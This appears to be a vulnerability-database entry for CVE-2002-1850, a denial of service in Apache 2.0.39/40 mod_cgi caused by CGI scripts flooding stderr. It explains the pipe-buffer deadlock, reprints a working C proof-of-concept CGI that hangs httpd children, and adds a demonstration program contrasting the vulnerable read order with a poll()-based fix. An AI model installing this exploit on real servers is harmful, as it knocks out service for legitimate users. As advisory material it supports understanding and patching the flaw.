Apache 2 mod_cgi STDERR Denial of Service Vulnerability

Vulnerability ID 1106990 Vulnerability type Other
Published 2002-09-24 Updated 2006-09-08
CVE ID CVE-2002-1850 CNNVD ID CNNVD-200212-121
Platform Linux CVSS score 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/21854
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-121
|Vulnerability details
Apache HTTP Server is an open-source web server from the Apache Software Foundation; it is fast, reliable and extensible through a simple API. Apache 2 mishandles CGI scripts that write large amounts of data to STDERR, and a local attacker can use this to mount a denial of service against the httpd process. Under mod_cgi, if a CGI script writes more than 4096 bytes to STDERR before it has finished writing and closed STDOUT, the script's write() call blocks, because mod_cgi is still waiting for more STDOUT data from the CGI. The root cause is that mod_cgi first reads STDOUT to completion and only then starts reading STDERR; the pipe behind the APR file_io stream holds only 4096 bytes, so once the script has filled it, every further write to STDERR blocks until mod_cgi drains part of the stream through APR file_io, which it never does while it is itself blocked on STDOUT. Because Apache 2 keeps waiting for more input from the malicious CGI, the httpd process hangs; once the number of hung processes reaches Apache's configured connection limit, Apache stops serving legitimate requests.
|Exploit
source: http://www.securityfocus.com/bid/5787/info

Apache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr exceeds the operating system's default pipe buffer (4096 bytes on the Linux kernels of the time).

This may be an issue in web applications that write user-supplied data to stderr, which would make it triggerable remotely. Local attackers, meaning anyone able to install a CGI script, can also exploit this issue.

This issue has been confirmed in Apache 2.0.39 and 2.0.40 on Linux. Apache on other platforms may also be affected. This issue does not appear to be present in versions prior to 2.0.x.

// Credit to: K.C. Wong
// Build this as a CGI program and install it under a ScriptAlias directory;
// each request for it leaves one httpd child hung on the stderr pipe.
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

// "short test\n" (11 bytes) + "test error=" (11) + 4074 letters + "\n" (1)
// = 4097 bytes, one byte more than the 4096-byte pipe buffer.
#define SIZE 4075

void out_err()
{
        char buffer[SIZE];
        int i = 0;

        for (i = 0; i < SIZE - 1; ++i)
                buffer[i] = 'a' + (char )(i % 26);

        buffer[SIZE - 1] = '\0';

        // Left disabled on purpose: with a non-blocking stderr the write
        // returns EAGAIN once the pipe is full instead of blocking, and
        // httpd does not hang.
        // fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

        fprintf(stderr, "short test\n");
        fflush(stderr);

        // The second write pushes the total past the pipe capacity; the CGI
        // blocks here while mod_cgi is still blocked reading stdout.
        fprintf(stderr, "test error=%s\n", buffer);
        fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
        // stdout is a pipe, so stdio buffers these headers; nothing reaches
        // mod_cgi until the fflush() below, which the CGI never gets to.
        fprintf(stdout, "Content-Type: text/html\r\n");
        fprintf(stdout, "\r\n\r\n");
        out_err();
        fprintf(stdout, "<HTML>\n");
        fprintf(stdout, "<body>\n");
        fprintf(stdout, "<h1>hello world</h1>\n");
        fprintf(stdout, "</body>\n");
        fprintf(stdout, "</HTML>\n");
        fflush(stdout);
        exit(0);
} // main()
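The deadlock the exploit relies on can be reproduced without Apache. The following program is an added example, not code from the page or from the Apache project: it forks a child that behaves like the CGI above (floods its stderr pipe before writing anything to stdout) and reads the child's output in two ways. `run_cgi(0, ...)` models mod_cgi's vulnerable order (read stdout to EOF, only then read stderr), `run_cgi(1, ...)` models the fix (service both pipes with poll() and read whichever is ready). The names `run_cgi`, `cgi_child`, `STDERR_BYTES` and `STALL_TIMEOUT_MS` are assumptions of this example; the real fix (the CGI bucket change linked in the references) is more involved than the poll() loop here. Because current Linux pipes default to 64 KiB rather than the 4 KiB of 2002 kernels, the child writes 256 KiB to stderr so the write() blocks on either; in the vulnerable mode the parent would wait forever, so it gives up after a timeout and kills the child to make the hang observable.

```c
#include <poll.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed CGI payload size: larger than any default pipe capacity
 * (64 KiB on current Linux; 4 KiB on the 2002 kernels the exploit targeted). */
#define STDERR_BYTES (256 * 1024)
/* How long the reader waits for progress before declaring the child wedged. */
#define STALL_TIMEOUT_MS 1500

/* Child side: stand-in for the CGI above, floods stderr before writing stdout. */
static void cgi_child(int out_fd, int err_fd)
{
    static const char body[] = "Content-Type: text/html\r\n\r\n<h1>hello world</h1>\n";
    char chunk[4096];
    size_t left = STDERR_BYTES;

    memset(chunk, 'a', sizeof chunk);
    while (left > 0) {
        size_t want = left < sizeof chunk ? left : sizeof chunk;
        ssize_t w = write(err_fd, chunk, want);   /* blocks once the pipe is full */
        if (w <= 0)
            _exit(2);
        left -= (size_t)w;
    }
    if (write(out_fd, body, sizeof body - 1) != (ssize_t)(sizeof body - 1))
        _exit(3);
    _exit(0);
}

/* Parent side, the mod_cgi role.
 * drain_stderr == 0: vulnerable order, stdout to EOF first, stderr afterwards.
 * drain_stderr != 0: hardened reader, poll() both pipes, read whichever is ready.
 * Returns 0 with byte counts on success, -1 when nothing moved for
 * STALL_TIMEOUT_MS (the deadlock; the child is then killed), -2 on setup error. */
int run_cgi(int drain_stderr, size_t *out_bytes, size_t *err_bytes)
{
    int out[2], err[2], stuck = 0, status;
    struct pollfd fds[2];
    nfds_t nfds = drain_stderr ? 2 : 1;
    size_t nout = 0, nerr = 0;
    char buf[8192];
    pid_t pid;

    if (pipe(out) < 0 || pipe(err) < 0)
        return -2;
    if ((pid = fork()) < 0)
        return -2;
    if (pid == 0) {
        close(out[0]);
        close(err[0]);
        cgi_child(out[1], err[1]);   /* never returns */
    }
    close(out[1]);
    close(err[1]);
    fds[0].fd = out[0]; fds[0].events = POLLIN;
    fds[1].fd = err[0]; fds[1].events = POLLIN;

    /* Phase 1: stdout (plus stderr at the same time only in hardened mode). */
    while (fds[0].fd >= 0 || (nfds == 2 && fds[1].fd >= 0)) {
        int r = poll(fds, nfds, STALL_TIMEOUT_MS);
        if (r <= 0) {            /* no progress: child in write(), we in read() */
            stuck = 1;
            break;
        }
        for (nfds_t i = 0; i < nfds; i++) {
            ssize_t n;
            if (fds[i].fd < 0 || !(fds[i].revents & (POLLIN | POLLHUP | POLLERR)))
                continue;
            n = read(fds[i].fd, buf, sizeof buf);
            if (n <= 0) {        /* EOF: child closed this end */
                close(fds[i].fd);
                fds[i].fd = -1;
            } else if (i == 0) {
                nout += (size_t)n;
            } else {
                nerr += (size_t)n;
            }
        }
    }
    /* Phase 2 (vulnerable order only): stderr is read after stdout hit EOF. */
    if (!stuck && nfds == 1) {
        ssize_t n;
        while ((n = read(fds[1].fd, buf, sizeof buf)) > 0)
            nerr += (size_t)n;
    }

    if (stuck)
        kill(pid, SIGKILL);
    waitpid(pid, &status, 0);
    if (fds[0].fd >= 0) close(fds[0].fd);
    if (fds[1].fd >= 0) close(fds[1].fd);
    if (out_bytes) *out_bytes = nout;
    if (err_bytes) *err_bytes = nerr;
    return stuck ? -1 : 0;
}

/* 1 if the chosen reader collected the whole CGI output, 0 if it deadlocked. */
int reader_completes(int drain_stderr)
{
    size_t o = 0, e = 0;
    return run_cgi(drain_stderr, &o, &e) == 0 && e == (size_t)STDERR_BYTES && o > 0;
}

int main(void)
{
    printf("stdout-first reader (mod_cgi 2.0.39/40 order): %s\n",
           reader_completes(0) ? "finished" : "deadlocked, child killed");
    printf("poll()-based reader: %s\n",
           reader_completes(1) ? "finished" : "deadlocked, child killed");
    return 0;
}
```

The vulnerable run takes STALL_TIMEOUT_MS to report, since the only way to observe the deadlock is to stop waiting; in httpd there is no such timeout, which is why each request for the CGI permanently consumes one child until MaxClients is reached.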
|References

Source: BID
Name: 8725
Link: http://www.securityfocus.com/bid/8725
Source: XF
Name: apache-stderr-dos (10200)
Link: http://www.iss.net/security_center/static/10200.php
Source: SECTRACK
Name: 1007823
Link: http://securitytracker.com/id?1007823
Source: issues.apache.org
Link: http://issues.apache.org/bugzilla/show_bug.cgi?id=22030
Source: BID
Name: 5787
Link: http://www.securityfocus.com/bid/5787
Source: BUGTRAQ
Name: 20020923 Apache 2.0.(39|40) DOS (PHP!)
Link: http://seclists.org/bugtraq/2002/Sep/0253.html
Source: MLIST
Name: [apache-httpd-dev] 20020925 CGI bucket needed
Link: http://marc.theaimsgroup.com/?l=apache-httpd-dev&m=103291952019514&w=2
Source: issues.apache.org
Link: http://issues.apache.org/bugzilla/show_bug.cgi?id=10515
Source: cvs.apache.org
Link: http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/generators/mod_cgi.c?r1=1.148.2.7&r2=1.148.2.8
Source: NSFOCUS
Name: 5483
Link: http://www.nsfocus.net/vulndb/5483